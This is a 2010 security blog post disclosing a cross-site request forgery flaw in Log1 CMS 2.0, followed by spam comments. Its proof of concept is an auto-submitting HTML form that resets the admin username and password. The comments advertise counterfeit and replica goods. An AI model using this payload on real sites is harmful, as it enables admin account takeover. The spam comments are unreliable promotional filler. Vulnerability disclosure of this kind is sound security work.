This site is soon to be deprecated by http://www.johnleitch.net

Monday, July 5, 2010

Log1 CMS 2.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in Log1 CMS 2.0 can be exploited to change the admin username and password.

PoC
<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/log1cms2.0/admin/main.php?action=step1">
            <input type="hidden" name="title" value="log1 CMS" />
            <input type="hidden" name="desc" value="log1cms official page" />
            <input type="hidden" name="key" value="log1, log 1, CMS, content managment system" />
            <input type="hidden" name="language" value="0" />
            <input type="hidden" name="bgcolor" value="#ffffff" />
            <input type="hidden" name="textcolor" value="#999999" />
            <input type="hidden" name="specialcolor" value="#000000" />
            <input type="hidden" name="login" value="admin" />
            <input type="hidden" name="pass" value="Password1" />
            <input type="hidden" name="isMd5" value="1" />
            <input type="hidden" name="google_login" value="gerard.caplain" />
            <input type="hidden" name="email" value="log_1[ at ]users.sourceforge.net" />
            <input type="hidden" name="copyright" value="2010 by log1" />
        </form>
    </body>
</html>
Posted by John Leitch at 9:38 AM
Labels: , ,

6 comments:

  1. GameforYouNovember 12, 2011 at 8:35 AM

    We really love your blog, i haven't seen you keeping the posts in in some time now. Is everything ok.
    Fort Worth Photographer
    enfamil baby formula

    ReplyDelete
  2. nguyenNovember 12, 2011 at 7:00 PM

    It properly. You really smart. I am very happy for it. Wish a nice day.good night.
    Kia Radiator
    acid stained concrete plano

    ReplyDelete
  3. tungNovember 12, 2011 at 8:50 PM

    i haven't seen you keeping the posts in in some time now. Is everything ok.


    __________________
    sales funnelEMS Supplies

    ReplyDelete
  4. quanDecember 18, 2011 at 11:21 AM

    gold coast recording studioCheap VPNTarantino's essaying of the Basterds themselves will doubtless bring about divergent reactions. One may interpret the American “Basterds” as ridiculous, over-the-top cartoon characters—although Tarantino does not afford most of them much time or weight, beyond Brad Pitt's Aldo Raine, Eli Roth's “Bear Jew” Donny Donowitz and Til Schweiger's Sergeant Hugo Stiglitz—so the cartoon quality of the characters is perhaps actually softened. Pitt is fine in his role and repeatedly quite

    ReplyDelete
  5. MCAJanuary 15, 2012 at 6:12 AM

    I like this way!!
    Siesta Key Vacation RentalsAdventure games online

    ReplyDelete
  6. chenlinaMay 31, 2016 at 5:41 PM

    chenlina20160601
    michael kors outlet
    ray ban wayfarer
    pandora jewelry
    ray ban wayfarer
    adidas running shoes
    nike store
    ray bans
    fake watches
    nike roshe run
    oakley sunglasses
    authentic louis vuitton handbags
    nike basketball shoes
    michael kors purses
    louis vuitton bags
    air jordans
    michael kors handbags
    fitflops sale clearance
    polo ralph lauren
    adidas nmd
    designer handbags
    oakley sunglasses outlet
    nike trainers uk
    michael kors outlet
    jordan 11 concord
    nike huarache
    juicy couture
    replica watches
    hollister clothing
    polo ralph lauren outlet
    air force 1
    ralph lauren outlet
    hollister
    michael kors outlet
    louis vuitton outlet
    tod's shoes
    insanity workout
    louis vuitton handbags
    cheap air jordans
    kate spade
    coach outlet
    as

    ReplyDelete

Subscribe to: Post Comments (Atom)